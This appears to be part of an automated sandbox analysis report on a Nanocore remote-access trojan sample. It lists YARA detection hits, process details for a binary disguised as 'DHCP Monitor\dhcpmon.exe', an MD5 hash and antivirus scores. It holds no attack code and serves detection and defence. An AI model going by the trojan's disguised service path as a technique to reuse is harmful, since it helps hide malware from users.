                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.483147601.0000000006C20000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.483147601.0000000006C20000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.483312618.0000000006CC0000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.483312618.0000000006CC0000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.483262615.0000000006C80000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.483262615.0000000006C80000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000028.00000002.482137152.0000000005260000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000028.00000002.479953948.0000000003D00000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000028.00000002.472289227.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000028.00000002.480292301.0000000003E77000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000028.00000002.480292301.0000000003E77000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        Reputation:low

                        General

                        Start time:10:18:28
                        Start date:02/08/2021
                        Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
                        Imagebase:0xca0000
                        File size:1378816 bytes
                        MD5 hash:8FA8F52DFC55D341300EFF8E4C44BA33
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 20%, ReversingLabs
                        Reputation:low

                        Disassembly

                        Code Analysis

                        Reset < >